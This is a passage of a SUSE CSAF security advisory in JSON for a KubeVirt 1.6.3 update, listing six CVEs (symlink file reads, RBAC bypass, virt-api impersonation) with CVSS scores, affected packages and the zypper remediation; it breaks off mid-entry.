"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "Security update for kubevirt, virt-api-container, virt-controller-container, virt-exportproxy-container, virt-exportserver-container, virt-handler-container, virt-launcher-container, virt-libguestfs-tools-container, virt-operator-container, virt-pr-helper-container",
"title": "Title of the patch"
},
{
"category": "description",
"text": "This update for kubevirt, virt-api-container, virt-controller-container, virt-exportproxy-container, virt-exportserver-container, virt-handler-container, virt-launcher-container, virt-libguestfs-tools-container, virt-operator-container, virt-pr-helper-container fixes the following issues:\n\nUpdated kubevirt to version 1.6.3:\n\n - CVE-2025-22872: Fixed incorrect interpretation of tags leading content to be placed wrong scope during DOM \n construction in golang.org/x/net/html (bsc#1241772)\n - CVE-2025-64432: Fixed bypass of RBAC controls due to incorrect validation of certain fields in the client\n TLS certificate (bsc#1253181)\n - CVE-2025-64433: Fixed arbitrary files read via improper symlink handling (bsc#1253185)\n - CVE-2025-64434: Fixed privilege escalation via virt-api impersonification due to compromise virt-handler\n instance (bsc#1253186)\n - CVE-2025-64437: Fixed mishandling of symlinks (bsc#1253194)\n - CVE-2025-64324: Fixed a logic bug that allows an attacker to read and write arbitrary files owned by more\n privileged users (bsc#1253748)\n\n",
"title": "Description of the patch"
},
{
"category": "details",
"text": "SUSE-2025-4330,SUSE-SLE-Module-Containers-15-SP7-2025-4330",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/suse-su-2025_4330-1.json"
},
{
"category": "self",
"summary": "URL for SUSE-SU-2025:4330-1",
"url": "https://www.suse.com/support/update/announcement/2025/suse-su-20254330-1/"
},
{
"category": "self",
"summary": "E-Mail link for SUSE-SU-2025:4330-1",
"url": "https://lists.suse.com/pipermail/sle-security-updates/2025-December/023449.html"
},
{
"category": "self",
"summary": "SUSE Bug 1241772",
"url": "https://bugzilla.suse.com/1241772"
},
{
"category": "self",
"summary": "SUSE Bug 1250683",
"url": "https://bugzilla.suse.com/1250683"
},
{
"category": "self",
"summary": "SUSE Bug 1253181",
"url": "https://bugzilla.suse.com/1253181"
},
{
"category": "self",
"summary": "SUSE Bug 1253185",
"url": "https://bugzilla.suse.com/1253185"
},
{
"category": "self",
"summary": "SUSE Bug 1253186",
"url": "https://bugzilla.suse.com/1253186"
},
{
"category": "self",
"summary": "SUSE Bug 1253194",
"url": "https://bugzilla.suse.com/1253194"
},
{
"category": "self",
"summary": "SUSE Bug 1253384",
"url": "https://bugzilla.suse.com/1253384"
},
{
"category": "self",
"summary": "SUSE Bug 1253748",
"url": "https://bugzilla.suse.com/1253748"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-22872 page",
"url": "https://www.suse.com/security/cve/CVE-2025-22872/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64324 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64324/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64432 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64432/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64433 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64433/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64434 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64434/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64437 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64437/"
}
],
"title": "Security update for kubevirt, virt-api-container, virt-controller-container, virt-exportproxy-container, virt-exportserver-container, virt-handler-container, virt-launcher-container, virt-libguestfs-tools-container, virt-operator-container, virt-pr-helper-container",
"tracking": {
"current_release_date": "2025-12-09T11:33:55Z",
"generator": {
"date": "2025-12-09T11:33:55Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "SUSE-SU-2025:4330-1",
"initial_release_date": "2025-12-09T11:33:55Z",
"revision_history": [
{
"date": "2025-12-09T11:33:55Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kubevirt-container-disk-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-container-disk-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-container-disk-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-manifests-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-pr-helper-conf-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-pr-helper-conf-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-pr-helper-conf-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-tests-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-tests-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-tests-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-api-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-virt-api-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-virt-api-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-controller-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-virt-controller-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-virt-controller-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportproxy-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-virt-exportproxy-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-virt-exportproxy-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportserver-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-virt-exportserver-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-virt-exportserver-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-handler-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-virt-handler-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-virt-handler-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-launcher-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-virt-launcher-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-virt-launcher-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-operator-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-virt-operator-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-virt-operator-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-synchronization-controller-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-virt-synchronization-controller-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-virt-synchronization-controller-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"product_id": "kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64"
}
},
{
"category": "product_version",
"name": "obs-service-kubevirt_containers_meta-1.6.3-150700.3.13.1.aarch64",
"product": {
"name": "obs-service-kubevirt_containers_meta-1.6.3-150700.3.13.1.aarch64",
"product_id": "obs-service-kubevirt_containers_meta-1.6.3-150700.3.13.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "kubevirt-container-disk-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-container-disk-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-container-disk-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-manifests-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-pr-helper-conf-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-pr-helper-conf-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-pr-helper-conf-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-tests-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-tests-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-tests-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-api-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-virt-api-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-virt-api-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-controller-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-virt-controller-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-virt-controller-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportproxy-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-virt-exportproxy-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-virt-exportproxy-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportserver-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-virt-exportserver-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-virt-exportserver-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-handler-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-virt-handler-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-virt-handler-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-launcher-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-virt-launcher-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-virt-launcher-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-operator-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-virt-operator-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-virt-operator-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-synchronization-controller-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-virt-synchronization-controller-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-virt-synchronization-controller-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64",
"product_id": "kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
}
},
{
"category": "product_version",
"name": "obs-service-kubevirt_containers_meta-1.6.3-150700.3.13.1.x86_64",
"product": {
"name": "obs-service-kubevirt_containers_meta-1.6.3-150700.3.13.1.x86_64",
"product_id": "obs-service-kubevirt_containers_meta-1.6.3-150700.3.13.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux Enterprise Module for Containers 15 SP7",
"product": {
"name": "SUSE Linux Enterprise Module for Containers 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Containers 15 SP7",
"product_identification_helper": {
"cpe": "cpe:/o:suse:sle-module-containers:15:sp7"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-manifests-1.6.3-150700.3.13.1.aarch64 as component of SUSE Linux Enterprise Module for Containers 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64"
},
"product_reference": "kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Containers 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-manifests-1.6.3-150700.3.13.1.x86_64 as component of SUSE Linux Enterprise Module for Containers 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64"
},
"product_reference": "kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Containers 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64 as component of SUSE Linux Enterprise Module for Containers 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64"
},
"product_reference": "kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Containers 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64 as component of SUSE Linux Enterprise Module for Containers 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
},
"product_reference": "kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Containers 15 SP7"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-22872",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-22872"
}
],
"notes": [
{
"category": "general",
"text": "The tokenizer incorrectly interprets tags with unquoted attribute values that end with a solidus character (/) as self-closing. When directly using Tokenizer, this can result in such tags incorrectly being marked as self-closing, and when using the Parse functions, this can result in content following such tags as being placed in the wrong scope during DOM construction, but only when tags are in foreign content (e.g. \u003cmath\u003e, \u003csvg\u003e, etc contexts).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-22872",
"url": "https://www.suse.com/security/cve/CVE-2025-22872"
},
{
"category": "external",
"summary": "SUSE Bug 1241710 for CVE-2025-22872",
"url": "https://bugzilla.suse.com/1241710"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-12-09T11:33:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-22872"
},
{
"cve": "CVE-2025-64324",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64324"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. The `hostDisk` feature in KubeVirt allows mounting a host file or directory owned by the user with UID 107 into a VM. However, prior to version 1.6.1 and 1.7.0, the implementation of this feature and more specifically the `DiskOrCreate` option (which creates a file if it doesn\u0027t exist) has a logic bug that allows an attacker to read and write arbitrary files owned by more privileged users on the host system. Versions 1.6.1 and 1.7.0 fix the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64324",
"url": "https://www.suse.com/security/cve/CVE-2025-64324"
},
{
"category": "external",
"summary": "SUSE Bug 1253748 for CVE-2025-64324",
"url": "https://bugzilla.suse.com/1253748"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-12-09T11:33:55Z",
"details": "important"
}
],
"title": "CVE-2025-64324"
},
{
"cve": "CVE-2025-64432",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64432"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Versions 1.5.3 and below, and 1.6.0 contained a flawed implementation of the Kubernetes aggregation layer\u0027s authentication flow which could enable bypass of RBAC controls. It was discovered that the virt-api component fails to correctly authenticate the client when receiving API requests over mTLS. In particular, it fails to validate the CN (Common Name) field in the received client TLS certificates against the set of allowed values defined in the extension-apiserver-authentication configmap. Failre to validate certain fields in the client TLS certificate may allow an attacker to bypass existing RBAC controls by directly communicating with the aggregated API server, impersonating the Kubernetes API server and its aggregator component. This issue is fixed in versions 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64432",
"url": "https://www.suse.com/security/cve/CVE-2025-64432"
},
{
"category": "external",
"summary": "SUSE Bug 1253181 for CVE-2025-64432",
"url": "https://bugzilla.suse.com/1253181"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.8,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-12-09T11:33:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-64432"
},
{
"cve": "CVE-2025-64433",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64433"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.5.3 and 1.6.1, a vulnerability was discovered that allows a VM to read arbitrary files from the virt-launcher pod\u0027s file system. This issue stems from improper symlink handling when mounting PVC disks into a VM. Specifically, if a malicious user has full or partial control over the contents of a PVC, they can create a symbolic link that points to a file within the virt-launcher pod\u0027s file system. Since libvirt can treat regular files as block devices, any file on the pod\u0027s file system that is symlinked in this way can be mounted into the VM and subsequently read. Although a security mechanism exists where VMs are executed as an unprivileged user with UID 107 inside the virt-launcher container, limiting the scope of accessible resources, this restriction is bypassed due to a second vulnerability. The latter causes the ownership of any file intended for mounting to be changed to the unprivileged user with UID 107 prior to mounting. As a result, an attacker can gain access to and read arbitrary files located within the virt-launcher pod\u0027s file system or on a mounted PVC from within the guest VM. This vulnerability is fixed in 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64433",
"url": "https://www.suse.com/security/cve/CVE-2025-64433"
},
{
"category": "external",
"summary": "SUSE Bug 1253185 for CVE-2025-64433",
"url": "https://bugzilla.suse.com/1253185"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-12-09T11:33:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-64433"
},
{
"cve": "CVE-2025-64434",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64434"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. Prior to 1.5.3 and 1.6.1, due to the peer verification logic in virt-handler (via verifyPeerCert), an attacker who compromises a virt-handler instance, could exploit these shared credentials to impersonate virt-api and execute privileged operations against other virt-handler instances potentially compromising the integrity and availability of the VM managed by it. This vulnerability is fixed in 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-64434",
"url": "https://www.suse.com/security/cve/CVE-2025-64434"
},
{
"category": "external",
"summary": "SUSE Bug 1253186 for CVE-2025-64434",
"url": "https://bugzilla.suse.com/1253186"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-manifests-1.6.3-150700.3.13.1.x86_64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.aarch64",
"SUSE Linux Enterprise Module for Containers 15 SP7:kubevirt-virtctl-1.6.3-150700.3.13.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-12-09T11:33:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-64434"
},
{
"cve": "CVE-2025-64437",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-64437"
}
],
"notes": [
{
"category": "general",
"text": "KubeVirt is a virtual machine management add-on for Kubernetes. In versions before 1.5.3 and 1.6.1, the virt-handler does not verify whether the launcher-sock is a symlink or a regular file. This oversight can be exploited, for example, to change the ownership of arbitrary files on the host node to the unprivileged user with UID 107 (the same user used by virt-launcher) thus, compromising the CIA (Confidentiality, Integrity and Availability) of data on the host. To successfully exploit this vulnerability, an attacker should be in control of the file system of the virt-launcher pod. This vulnerability is fixed in 1.5.3 and 1.6.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
